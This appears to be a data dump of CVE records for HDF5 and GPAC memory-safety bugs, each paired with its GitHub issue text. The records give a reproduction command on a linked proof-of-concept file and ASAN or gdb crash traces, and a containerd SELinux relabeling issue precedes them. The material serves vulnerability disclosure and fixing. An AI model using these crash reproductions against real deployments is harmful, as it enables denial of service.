pause volumeMounts: - mountPath: /etc/hosts name: host-etc-hosts volumes: - name: host-etc-hosts hostPath: path: /etc/hosts type: FileOrCreate ``` 4. Wiat for the pod to spin up then check your `/etc/hosts`: ``` [vagrant@node-1 ~]$ ls -alZ /etc/hosts -rw-r--r--. 1 root root system_u:object_r:container_file_t:s0:c31,c726 182 Nov 2 00:11 /etc/hosts ``` ``` [vagrant@node-1 ~]$ ps auxZ | grep c31,c726 | grep -v grep system_u:system_r:container_t:s0:c31,c726 65535 31673 0.0 0.0 972 4 ? Ss 00:27 0:00 /pause system_u:system_r:container_t:s0:c31,c726 root 31753 0.0 1.2 740120 26100 ? Ssl 00:27 0:00 /agnhost pause ``` --- ### Describe the results you received and expected Expected: `/etc/hosts` retained `net_conf_t` type label with no categories Received: `/etc/hosts` relabeled to `container_file_t` with category labels specific to the container that bind-mounted it ### What version of containerd are you using? v1.5.7 (and v1.5.7-k3s1) ### Any other relevant information ``` $ kubectl get node -o wide NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME node-1 Ready control-plane,etcd,master 15m v1.22.3+rke2r1 192.168.121.104 <none> CentOS Stream 8 4.18.0-277.el8.x86_64 containerd://1.5.7-k3s1 ``` --- First seen while running k8s e2e conformance via sonobuoy against rke2 v1.22.2-rc1+rke2r1 (most recently against v1.22.3-rc1+rke2r1): https://github.com/rancher/rke2/issues/2068 _(Also seen with k3s 1.22.x that also ships with containerd v1.5.7)_ ### Show configuration if it is related to CRI plugin. ```toml # [vagrant@node-1 ~]$ sudo cat /var/lib/rancher/rke2/agent/etc/containerd/config.toml [plugins.opt] path = "/var/lib/rancher/rke2/agent/containerd" [plugins.cri] stream_server_address = "127.0.0.1" stream_server_port = "10010" enable_selinux = true sandbox_image = "index.docker.io/rancher/pause:3.5" [plugins.cri.containerd] snapshotter = "overlayfs" disable_snapshot_annotations = true [plugins.cri.containerd.runtimes.runc] runtime_type = "io.containerd.runc.v2" ```
cri + selinux: /etc/hosts from hostPath mount getting relabeled
https://api.github.com/repos/containerd/containerd/issues/6194/comments
3
2021-11-02T00:39:45Z
2022-09-12T18:05:10Z
https://github.com/containerd/containerd/issues/6194
1,041,776,782
6,194
2,939
CVE-2021-45830
2022-01-05T20:15:07.897
A heap-based buffer overflow vulnerability exists in HDF5 1.13.1-1 via H5F_addr_decode_len in /hdf5/src/H5Fint.c, which could cause a Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/1314" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/1314" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hdfgroup:hdf5:1.13.1-1:*:*:*:*:*:*:*", "matchCriteriaId": "3E27D5C4-8DAF-4738-9B3A-9C3E0E867F5E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/HDFGroup/hdf5/issues/1314
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "HDFGroup", "hdf5" ]
**Version:** ``` Version 1.13.1-1 ``` **System information** ``` Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) ``` **command:** ``` h5format_convert -n POC5 ``` [POC5.zip](https://github.com/HDFGroup/hdf5/files/7739297/POC5.zip) **result** ``` segmentation fault ``` **ASAN information** ``` ==3895624==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6060000053a0 at pc 0x55f43fe64fa1 bp 0x7fff5fa6dc60 sp 0x7fff5fa6dc50 READ of size 1 at 0x6060000053a0 thread T0 #0 0x55f43fe64fa0 in H5F_addr_decode_len /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fint.c:2855 #1 0x55f43ffd5f01 in H5O__fsinfo_decode /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Ofsinfo.c:186 #2 0x55f43ffefb74 in H5O_msg_read_oh /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Omessage.c:514 #3 0x55f43fff033b in H5O_msg_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Omessage.c:455 #4 0x55f43fe7e8d7 in H5F__super_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fsuper.c:782 #5 0x55f43fe6b6d1 in H5F_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fint.c:1963 #6 0x55f44029730b in H5VL__native_file_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLnative_file.c:127 #7 0x55f44026b72b in H5VL__file_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:3497 #8 0x55f44026b72b in H5VL_file_open /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:3646 #9 0x55f43fe46570 in H5F__open_api_common /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5F.c:795 #10 0x55f43fe4a7eb in H5Fopen /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5F.c:836 #11 0x55f43fce521b in h5tools_fopen /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/lib/h5tools.c:932 #12 0x55f43fcdcafa in main /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5format_convert/h5format_convert.c:409 #13 0x7f67d18450b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #14 0x55f43fce03ed in _start (/home/zxq/CVE_testing/source/hdf5-add/hdf5/build/bin/h5format_convert+0x16e3ed) 0x6060000053a0 is located 0 bytes to the right of 64-byte region [0x606000005360,0x6060000053a0) allocated by thread T0 here: #0 0x7f67d1c72bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8) #1 0x55f43febb1fe in H5FL__malloc /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5FL.c:238 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Fint.c:2855 in H5F_addr_decode_len Shadow bytes around the buggy address: 0x0c0c7fff8a20: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff8a30: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff8a40: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c7fff8a50: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0c7fff8a60: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 =>0x0c0c7fff8a70: 00 00 00 00[fa]fa fa fa 00 00 00 00 00 00 00 fa 0x0c0c7fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ```
heap-buffer-overflow atH5F_addr_decode_len /hdf5/src/H5Fint.c:2855
https://api.github.com/repos/HDFGroup/hdf5/issues/1314/comments
2
2021-12-18T13:32:06Z
2023-05-04T18:44:39Z
https://github.com/HDFGroup/hdf5/issues/1314
1,083,833,839
1,314
2,940
CVE-2021-45831
2022-01-05T20:15:07.950
A Null Pointer Dereference vulnerability exitgs in GPAC 1.0.1 in MP4Box via __strlen_avx2, which causes a Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1990" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1990" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1990
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) **command:** ``` ./bin/gcc/MP4Box -bt POC1 ``` [POC1.zip](https://github.com/gpac/gpac/files/7711140/POC1.zip) **Result** ``` [5] 2204206 segmentation fault ./sourceproject/momey/gpac/bin/gcc/MP4Box -bt ``` **Gdb information** ``` Stopped reason: SIGSEGV __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65 65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or directory. gdb-peda$ bt #0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65 #1 0x00007ffff755a503 in __GI___strdup (s=0x0) at strdup.c:41 #2 0x00007ffff7851545 in gf_svg_dump_attribute () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 #3 0x00007ffff7a497e2 in gf_dump_svg_element () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 #4 0x00007ffff7a4a9b0 in gf_sm_dump_command_list () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 #5 0x00007ffff7a5173d in gf_sm_dump () from /home/zxq/CVE_testing/sourceproject/momey/gpac/bin/gcc/libgpac.so.10 #6 0x0000555555585418 in dump_isom_scene () #7 0x000055555557c42c in mp4boxMain () #8 0x00007ffff74df0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x3, argv=0x7fffffffe248, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe238) at ../csu/libc-start.c:308 #9 0x000055555556d45e in _start () ```
Null Pointer Dereference in __strlen_avx2 ()
https://api.github.com/repos/gpac/gpac/issues/1990/comments
3
2021-12-14T11:19:27Z
2021-12-15T08:50:11Z
https://github.com/gpac/gpac/issues/1990
1,079,632,902
1,990
2,941
CVE-2021-45832
2022-01-05T21:15:07.780
A Stack-based Buffer Overflow Vulnerability exists in HDF5 1.13.1-1 at at hdf5/src/H5Eint.c, which causes a Denial of Service (context-dependent).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/1315" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/1315" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hdfgroup:hdf5:1.13.1-1:*:*:*:*:*:*:*", "matchCriteriaId": "3E27D5C4-8DAF-4738-9B3A-9C3E0E867F5E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/HDFGroup/hdf5/issues/1315
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "HDFGroup", "hdf5" ]
**Version:** ``` Version 1.13.1-1 ``` **System information** ``` Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) ``` **command:** ``` h5format_convert -n POC6 ``` [POC6.zip](https://github.com/HDFGroup/hdf5/files/7739303/POC6.zip) **result** ``` segmentation fault ``` **ASAN information** ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==223590==ERROR: AddressSanitizer: stack-overflow on address 0x7ffee0f76f70 (pc 0x7fd7a0c52b99 bp 0x7ffee0f777c0 sp 0x7ffee0f76f60 T0) #0 0x7fd7a0c52b98 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10db98) #1 0x7fd7a088ccbd (/lib/x86_64-linux-gnu/libc.so.6+0x8ecbd) #2 0x55d14d2e76d2 in vasprintf /usr/include/x86_64-linux-gnu/bits/stdio2.h:213 #3 0x55d14d2e76d2 in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/ #4 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #5 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #6 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #7 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #8 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #9 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #10 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #11 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #12 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #13 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #14 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #15 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #16 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #17 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #18 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #19 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #20 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #21 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #22 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #23 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #24 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #25 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #26 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #27 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #28 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #29 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #30 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #31 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #32 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #33 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #34 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #35 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #36 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #37 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #38 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #39 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #40 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #41 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #42 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #43 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 #44 0x55d14d2e732e in H5E__push_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:766 #45 0x55d14d2e771c in H5E_printf_stack /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Eint.c:687 #46 0x55d14d415e08 in H5I_inc_ref /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Iint.c:1326 ```
stack overflow at hdf5/src/H5Eint.c
https://api.github.com/repos/HDFGroup/hdf5/issues/1315/comments
3
2021-12-18T13:38:31Z
2023-05-04T20:22:11Z
https://github.com/HDFGroup/hdf5/issues/1315
1,083,835,005
1,315
2,942
CVE-2021-45833
2022-01-05T21:15:07.833
A Stack-based Buffer Overflow Vulnerability exists in HDF5 1.13.1-1 via the H5D__create_chunk_file_map_hyper function in /hdf5/src/H5Dchunk.c, which causes a Denial of Service (context-dependent).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/1313" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/1313" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hdfgroup:hdf5:1.13.1-1:*:*:*:*:*:*:*", "matchCriteriaId": "3E27D5C4-8DAF-4738-9B3A-9C3E0E867F5E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/HDFGroup/hdf5/issues/1313
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "HDFGroup", "hdf5" ]
**Version:** ``` h5dump: Version 1.13.1-1 ``` **System information** ``` Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) ``` **command:** ``` h5dump POC3 ``` [POC3.zip](https://github.com/HDFGroup/hdf5/files/7739269/POC3.zip) **ASAN information** ``` ================================================================ ==3192859==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc401ba928 at pc 0x5582bd69885b bp 0x7ffc401b8720 sp 0x7ffc401b8710 READ of size 8 at 0x7ffc401ba928 thread T0 #0 0x5582bd69885a in H5D__create_chunk_file_map_hyper /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dchunk.c:1927 #1 0x5582bd69885a in H5D__chunk_io_init_selections /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dchunk.c:1250 #2 0x5582bd69885a in H5D__chunk_io_init /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dchunk.c:1129 #3 0x5582bd14a71e in H5D__read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Dio.c:250 #4 0x5582bd60459a in H5VL__native_dataset_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLnative_dataset.c:293 #5 0x5582bd5d6442 in H5VL__dataset_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:2045 #6 0x5582bd5d6442 in H5VL_dataset_read /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5VLcallback.c:2077 #7 0x5582bd11da4d in H5D__read_api_common /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5D.c:968 #8 0x5582bd11da4d in H5Dread /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5D.c:1020 #9 0x5582bd04b454 in h5tools_dump_simple_dset /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/lib/h5tools_dump.c:1755 #10 0x5582bd04b454 in h5tools_dump_dset /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/lib/h5tools_dump.c:1956 #11 0x5582bd05fa5f in h5tools_dump_data /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/lib/h5tools_dump.c:4425 #12 0x5582bd01bb3c in dump_dataset /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5dump/h5dump_ddl.c:1046 #13 0x5582bd0245c1 in dump_all_cb /home/zxq/CVE_testing/source/hdf5-add/hdf5/tools/src/h5dump/h5dump_ddl.c:350 #14 0x5582bd23d995 in H5G__iterate_cb /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gint.c:866 #15 0x5582bd23d995 in H5G__iterate_cb /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gint.c:839 #16 0x5582bd24e3ec in H5G__node_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gnode.c:967 #17 0x5582bd67e5a3 in H5B__iterate_helper /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5B.c:1152 #18 0x5582bd681cca in H5B_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5B.c:1194 #19 0x5582bd25b699 in H5G__stab_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gstab.c:536 #20 0x5582bd255216 in H5G__obj_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gobj.c:672 #21 0x5582bd24061c in H5G_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Gint.c:922 #22 0x5582bd2dc94f in H5L_iterate /home/zxq/CVE_testing/source/hdf5-add/hdf5/src/H5Lint.c:2243 #23 0x5582bd610f3e in H5VL__native_link_specific 